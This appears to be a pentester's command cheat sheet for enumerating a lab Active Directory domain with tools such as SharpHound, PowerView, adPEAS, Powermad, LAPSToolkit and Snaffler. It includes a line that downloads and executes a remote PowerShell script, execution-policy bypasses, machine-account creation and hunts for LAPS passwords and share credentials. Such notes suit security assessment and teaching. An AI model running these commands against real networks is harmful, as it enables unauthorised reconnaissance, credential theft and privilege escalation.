Login as a local admin user and configure your system DNS server to be the IP address of a domain controller in the target domain firstly if the DNS is not configured automatically when the IP address is assigned.
(Control Panel > Network and Internet > Network Connections > Ethernet Properties > IPv4 Properties)
Also, it can be set through the Powershell.
#Open a Powershell window as Administrator.
Get-NetAdapter; $index = $(Read-Host -Prompt '[*] Set index of interface '); $dnsIp = $(Read-Host -Prompt '[*] DC IP address ');
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsIpSo that you can resolve the target domain.
ping unsafe.local
nslookup unsafe.localAfter the below runas commands, you must check to access SYSVOL and NETLOGON folders with the following command:
net view \\unsafe.local\You must see the SYSVOL and NETLOGON folders if you supply a valid password for the "runas" command.
Nslookup
#For finding DCs
C:\> nslookup
> set type=SRV
> _ldap._tcp.dc._msdcs.unsafe.local
#To find all of the available records
C:\> nslookup -type=any unsafe.localGpresult
#Displays verbose policy information for remote computer
gpresult /v /s target-IP /u username /p password /scope computer
gpresult /z /s target-IP /u username /p password /scope computer
#Displays RSoP summary data for remote computer
gpresult /r /s target-IP /u username /p password /scope computerRSAT
#1. Download and install RSAT
#2. Run cmd.exe as Administrator
#3. Spawn a MMC as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser "mmc /server=unsafe.local"
#4. File > Open > File name: C:\Windows\System32 > dsa (for example) > clickPowershell ActiveDirectory Module
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Running cmdlets
C:\> Get-ADDomain -Server DC1.unsafe.local
C:\> Get-ADUser -Identity luser -Server DC_IP_address -Properties *Netdom
# List workstation, server, dc, pdc, fsmo and trust information
C:\> netdom query fsmo /domain:unsafe.local
C:\> netdom query workstation /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query server /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query dc /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query pdc /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
C:\> netdom query trust /d:unsafe /ud:UNSAFE\luser /pd:S3cP@ss
# Adding a computer account
C:\> netdom add /d:unsafe.local machine /ud:UNSAFE\luser /pd:S3cP@ssDsquery
# List workstation, dc, ou, site information and query with LDAP filter
C:\> dsquery user -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery computer -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery ou -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery site -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery server -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL" -u unsafe\luser -p P@ssw0rd -d unsafe.local
C:\> dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))" -attr distinguishedName userAccountControl -u unsafe\luser -p P@ssw0rd -d unsafe.localPowerView
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Set Execution policy as Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser
#3. Import Module
Import-Module C:\Users\desktop2\Desktop\AD-Tools\Tools\PowerView_dev.ps1
#4. Running a cmdlet
Get-NetDomainADACLScanner (unstable)
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Set Execution policy as Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser
#3. Generate a report from the command line:
.\ADACLScan.ps1 -Base "DC=unsafe,DC=local" -Scope subtree -Server dc.unsafe.local -Port 389 -Output HTML -Show
.\ADACLScan.ps1 -Base "DC=unsafe,DC=local" -Scope subtree -Server dc.unsafe.local -Port 389 -EffectiveRightsPrincipal ruser -Output HTML -ShowadPEAS
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/61106960/adPEAS/main/adPEAS.ps1')
#Bloodhound module is excluded
Invoke-adPEAS -Domain unsafe.local -Username 'unsafe\luser' -Password 'S3cP@ss' -Module Domain,CA,Creds,Delegation,Accounts,Computer -VulnsADRecon
# To run ADRecon on a non-member host using LDAP.
PS C:\>.\ADRecon.ps1 -Protocol LDAP -DomainController <IP or FQDN> -Credential <domain\username>SharpHound
#Method 1
#1. Spawn a CMD shell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
#2. Run SharpHound, using the -d flag to specify the AD domain you want to collect information from. You can also use any other flags you wish.
C:\> SharpHound.exe -d unsafe.local -c All --outputdirectory C:\Users\desktop2\Desktop
#3. For session loop collection method (default 2 hours)
C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop
C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop --Loopduration 01:00:00
#Method 2
C:\> SharpHound.exe -d unsafe.local -c All --ldapusername ruser --ldappassword Password
C:\> SharpHound.exe -d unsafe.local --CollectionMethods Session --Loop --ldapusername ruser --ldappassword Password
C:\> SharpHound.exe -d unsafe.local --CollectionMethods LoggedOn --ldapusername ruser --ldappassword Password
#Note: After uploading the data to Bloodhound, AD-miner can be executed.
AD-miner -c -cf Report -u neo4j -p mypasswordPurpleKnight
#1. Download PurpleKnight and unzip the archive
#2. Spawn a CMD shell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
#3. Set Execution policy as Bypass
C:\> powershell -c "Set-ExecutionPolicy Bypass -Scope CurrentUser"
#4. Run the executable from CMD
C:\> .\PurpleKnight.exe
#5. It will be opened and not detect a forest as expected. Type the domain name (e.g: unsafe.local) and click select > next > 'run tests'.Pingcastle
#1. Download Pingcastle and unzip the archive
#2. Spawn a CMD shell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
#3. Generate a HTML healthcheck report for domain:
C:\> .\PingCastle.exe --log --healthcheck --server unsafe.local
#4. To scan for the Zerologon vulnerability:
C:\> .\PingCastle.exe --log --scanner zerologon --server unsafe.local.Net System.DirectoryServices.ActiveDirectory namespace
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
runas /netonly /user:UNSAFE\ruser powershell.exe
#Get the forest information:
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
#Get the current user's domain information:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
#Get information of DCs:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers
#Find Primary DC:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().pdcroleowner
#Find Schema Master:
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().Forest.SchemaRoleOwner
#Get trusts for forest:
$forest = "unsafe.local"
([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', $forest)))).GetAllTrustRelationships()
#Get trusts for current domain:
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
#Get a list of sites in the forest:
[System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().sites
#Determine the SID filtering status of a trust. If the output is "true", SID filtering is enabled.
$domain="gotham.unsafe.local"
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetSidFilteringStatus($domain)Powermad
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Set Execution policy as Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser
#3. Import Module
Import-Module .\Powermad.ps1
#4. Add a machine account
$pass = ConvertTo-SecureString "MaQ.321" -AsPlainText -Force
New-MachineAccount -MachineAccount maq -Password $pass -Verbose
# Get an attribute value of the machine account
Get-MachineAccountAttribute -MachineAccount maq -Attribute distinguishedname
# Get SID of the machine account creator (ms-DS-CreatorSID)
Get-MachineAccountCreator -DistinguishedName "CN=maq,CN=Computers,DC=unsafe,DC=local"
Get-MachineAccountCreator
# Set an attribute value of the machine account
Set-MachineAccountAttribute -MachineAccount maq -Attribute description -Value test
# Disable the machine account
Disable-MachineAccount -MachineAccount maqLAPSToolkit
#1. Spawn a Powershell as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser powershell.exe
#2. Set Execution policy as Bypass
Set-ExecutionPolicy Bypass -Scope CurrentUser
#3. Import Module
Import-Module .\LAPSToolkit.ps1
#4. Displays all computers with LAPS enabled
Get-LAPSComputers
#5. Searches through all OUs to see which AD groups can read the ms-Mcs-AdmPwd attribute.
Find-LAPSDelegatedGroups
#6. Checks the rights on each computer with LAPS enabled for any groups with read access and users with AllExtendedRights.
Find-AdmPwdExtendedRightsLDAPMonitor
# For monitoring creation, deletion and changes to LDAP objects
C:\> SharpLDAPmonitor.exe /dcip:DC_IP_address /user:UNSAFE\luser /pass:S3cP@ssSnaffler
#1. Spawn a CMD as a user in that domain using runas and its /netonly flag and enter the password.
C:\> runas /netonly /user:UNSAFE\ruser cmd.exe
#2. Fire up Snaffler
C:\> Snaffler.exe -s -d unsafe.local -c [DomainController-IP] -o snaffler.loghttps://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html
https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html
https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc772217(v=ws.11)
https://github.com/p0dalirius/LDAPmonitor
https://learn.microsoft.com/en-us/powershell/module/activedirectory/?view=windowsserver2022-ps
https://github.com/61106960/adPEAS
https://github.com/Kevin-Robertson/Powermad
https://github.com/leoloobeek/LAPSToolkit
https://www.pingcastle.com/
https://www.purple-knight.com/
https://github.com/SnaffCon/Snaffler
https://github.com/sense-of-security/ADRecon
https://github.com/Mazars-Tech/AD_Miner